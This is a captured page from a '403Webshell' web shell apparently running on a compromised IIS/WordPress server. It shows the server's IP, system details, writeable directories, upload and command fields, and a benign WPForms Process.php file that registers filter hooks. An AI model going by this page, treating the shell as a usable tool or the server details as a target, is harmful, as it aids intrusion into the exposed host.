403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/6pocketz/wp-content/plugins/wpforms/src/Pro/Forms/Fields/Layout/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/6pocketz/wp-content/plugins/wpforms/src/Pro/Forms/Fields/Layout/Process.php
<?php

namespace WPForms\Pro\Forms\Fields\Layout;

/**
 * Layout field's Process class.
 *
 * @since 1.8.9
 */
class Process {
	/**
	 * Initialize.
	 *
	 * @since 1.8.9
	 */
	public function init() {

		$this->hooks();
	}

	/**
	 * Hooks.
	 *
	 * @since 1.8.9
	 */
	private function hooks() {

		add_filter( 'wpforms_pro_admin_entries_export_ajax_form_data', [ Helpers::class, 'reorder_fields_within_rows' ], 30 );
		add_filter( 'wpforms_process_before_form_data', [ Helpers::class, 'reorder_fields_within_rows' ], 30 );
		add_filter( 'wpforms_emails_notifications_form_data', [ Helpers::class, 'reorder_fields_within_rows' ], 30 );
		add_filter( 'wpforms_pro_admin_entries_edit_form_data', [ Helpers::class, 'reorder_fields_within_rows' ], 30 );
		add_filter( 'wpforms_entry_preview_form_data', [ Helpers::class, 'reorder_fields_within_rows' ], 30 );
		add_filter( 'wpforms_forms_fields_payment_total_field_display_form_data', [ Helpers::class, 'reorder_fields_within_rows' ], 30 );
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit